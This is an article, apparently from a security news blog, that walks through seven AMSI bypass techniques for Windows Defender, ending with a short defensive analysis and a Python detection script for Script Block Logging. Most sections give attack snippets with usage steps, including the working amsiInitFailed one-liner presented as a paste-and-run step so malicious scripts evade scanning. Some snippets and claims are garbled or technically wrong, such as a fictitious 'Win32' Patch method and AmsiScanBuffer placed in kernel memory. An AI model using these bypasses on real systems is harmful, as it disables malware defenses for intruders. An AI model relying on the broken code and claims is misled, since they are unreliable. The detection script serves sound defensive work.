AMSI Bypass Techniques: Evolution, Exploitation, and Defense

Introduction:

The Antimalware Scan Interface (AMSI) is a critical Windows security feature enabling real-time script scanning. Attackers continually develop bypass techniques to evade detection, with reflection-based methods posing significant threats. Shaquib Izhar’s updated AMSI Bypass Generator exemplifies this arms race, automating novel reflection bypasses targeting Windows Defender.

Learning Objectives:

  • Understand AMSI architecture and common bypass vectors.
  • Execute and analyze reflection-based AMSI bypasses.
  • Implement defenses against dynamic bypass techniques.

1. AMSI Context Initialization Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Step-by-Step Guide:

1. Purpose: Disables AMSI by forcing initialization failure.

2. Usage:

  • Open PowerShell.
  • Paste the command to patch the `amsiInitFailed` flag.

3. Effect: Subsequent malicious scripts evade AMSI scans.

2. Memory Patching via Reflection

$Win32 = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType('Win32').GetMethod('Patch').Invoke($null, @($Win32, [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)))

Step-by-Step Guide:

1. Purpose: Overwrites AMSI function pointers in memory.

2. Usage:

  • Allocate memory with AllocHGlobal.
  • Inject shellcode (e.g., 0xB8...) to disable AmsiScanBuffer.

3. Effect: Bypasses signature-based detection for PowerShell payloads.

3. Constrained Language Mode (CLM) Bypass

$ExecutionContext.SessionState.LanguageMode = "FullLanguage" 

Step-by-Step Guide:

1. Purpose: Escapes PowerShell’s Constrained Language Mode (CLM).

2. Usage:

  • Execute in a CLM-locked session.
  • Sets language mode to “FullLanguage,” enabling unrestricted code execution.

3. Effect: Unblocks AMSI bypass modules like AmsiScanBuffer patchers.

4. API Obfuscation for Defender Evasion

$Hash = [System.Security.Cryptography.SHA256]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes('amsiInit')) 
$API = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc $Hash), $DelegateType) 

Step-by-Step Guide:

1. Purpose: Dynamically resolves APIs via hashing to evade static signatures.

2. Usage:

  • Hash critical API names (e.g., AmsiScanBuffer).
  • Resolve function pointers at runtime.

3. Effect: Bypasses Defender’s signature-based hooks.

5. .NET Reflection for AMSI Unhooking

var amsiContext = typeof(PSObject).Assembly.GetType("System.Management.Automation.AmsiUtils"); 
var field = amsiContext.GetField("amsiSession", BindingFlags.NonPublic | BindingFlags.Static); 
field.SetValue(null, IntPtr.Zero); 

Step-by-Step Guide:

1. Purpose: Nullifies AMSI’s session context via .NET reflection.

2. Usage:

  • Compile as a C# class in PowerShell using Add-Type.
  • Execute to reset amsiSession.

3. Effect: Forces AMSI to reinitialize, crashing active scans.

6. Heap Encryption for In-Memory Payloads

$Payload = [System.Text.Encoding]::UTF8.GetBytes("MaliciousPayload") 
$Encrypted = [Security.Cryptography.ProtectedData]::Protect($Payload, $null, 'CurrentUser') 
[Runtime.InteropServices.Marshal]::Copy($Encrypted, 0, $Alloc, $Encrypted.Length) 

Step-by-Step Guide:

1. Purpose: Encrypts payloads using Windows DPAPI.

2. Usage:

  • Encrypt payloads with ProtectedData::Protect.
  • Copy to executable memory.

3. Effect: Evades in-memory scanners like AMSI and Defender’s runtime inspection.

7. Syscall Stomping for Kernel-Level Evasion

NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &size, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy((void*)amsiScanBufferAddr, shellcode, shellcode_len);

Step-by-Step Guide:

1. Purpose: Directly patches `AmsiScanBuffer` in kernel memory.

2. Usage:

  • Use direct syscalls (NtProtectVirtualMemory) to modify memory permissions.
  • Overwrite `AmsiScanBuffer` with benign shellcode.

3. Effect: Bypasses user- and kernel-mode hooks.

What Undercode Says:

Key Takeaway 1: Automation tools like Izhar’s generator democratize advanced bypasses, lowering entry barriers for attackers.
Key Takeaway 2: Defender-specific bypasses highlight the fragility of signature-dependent security.

Analysis:

The rise of dynamically generated AMSI bypasses signals a shift toward ephemeral, polymorphic attacks. Traditional static detection is increasingly ineffective, as each generator iteration produces unique bypass variants. Defenders must prioritize behavior-based monitoring (e.g., detecting abnormal PowerShell reflection) and restrict scripting privileges. Future threats will likely blend AI-generated code with API unhooking, forcing adoption of hardware-enforced security (e.g., Kernel DMA Protection). Proactive threat hunting for AMSI tampering artifacts—such as `amsiInitFailed` modifications—is now essential.
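As an added defensive example (not from the original post or from the generator it describes), the following Python applies the tampering artifacts named in the seven sections above to constructed PowerShell Script Block Logging (Event ID 4104) texts and reports which ones fire. The rule names, the sample events and the simple quote-concatenation normalization are my assumptions; real telemetry needs deeper de-obfuscation than this.

```python
import re

# Constructed sample 4104 (PowerShell ScriptBlock Logging) texts, not real telemetry.
SAMPLE_EVENTS = {
    "benign_inventory": "Get-ChildItem C:\\Windows\\System32 | Measure-Object",
    "amsi_init_failed": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    "split_string": "[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils')",
    "clm_escape": '$ExecutionContext.SessionState.LanguageMode = "FullLanguage"',
    "hashed_api": "$API = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc $Hash), $T)",
    "dpapi_staged": "$E = [Security.Cryptography.ProtectedData]::Protect($P, $null, 'CurrentUser'); "
                    "[Runtime.InteropServices.Marshal]::Copy($E, 0, $Alloc, $E.Length)",
    "dpapi_legit": "[Security.Cryptography.ProtectedData]::Protect($secret, $null, 'CurrentUser')",
}

# One rule per tampering artifact the sections above describe; matched against normalized text.
RULES = {
    # Sections 1 and 5: reflection on the internal AmsiUtils class or its static fields
    "amsi_reflection": re.compile(r"amsiutils|amsiinitfailed|amsisession|amsicontext"),
    # Sections 2 and 7: the scan export named outright, or the memory-protection calls used to patch it
    "amsi_export_or_patch": re.compile(r"amsiscanbuffer|ntprotectvirtualmemory|virtualprotect"),
    # Section 4: turning a runtime-resolved pointer into a callable delegate (hashed API lookup)
    "delegate_from_pointer": re.compile(r"getdelegateforfunctionpointer"),
    # Section 3: lifting Constrained Language Mode from inside the session
    "language_mode_tamper": re.compile(r"languagemode\s*=\s*[\"']fulllanguage"),
    # Section 6: DPAPI blob copied into unmanaged memory; DPAPI alone is common and benign, so both halves are required
    "dpapi_to_unmanaged": re.compile(r"protecteddata\]::(un)?protect.*marshal\]::copy", re.S),
}

CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")


def normalize(text):
    """Fold case (PowerShell is case-insensitive) and join 'Am'+'si' fragments so split-string obfuscation does not hide literals."""
    return CONCAT.sub("", text).lower()


def scan_script_block(text):
    """Return the names of every rule that fires on one script block text."""
    norm = normalize(text)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def triage(events):
    """Map event label -> matched rules, dropping events that match nothing."""
    return {label: hits for label, text in events.items() if (hits := scan_script_block(text))}


if __name__ == "__main__":
    for label, hits in triage(SAMPLE_EVENTS).items():
        print(f"{label}: {', '.join(hits)}")
```

Feeding exported 4104 messages through `triage` gives a first-pass hunt list; the `dpapi_legit` sample shows why single-indicator rules for common APIs are kept out.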

Reported By: Shaquib Izhar – Hackers Feeds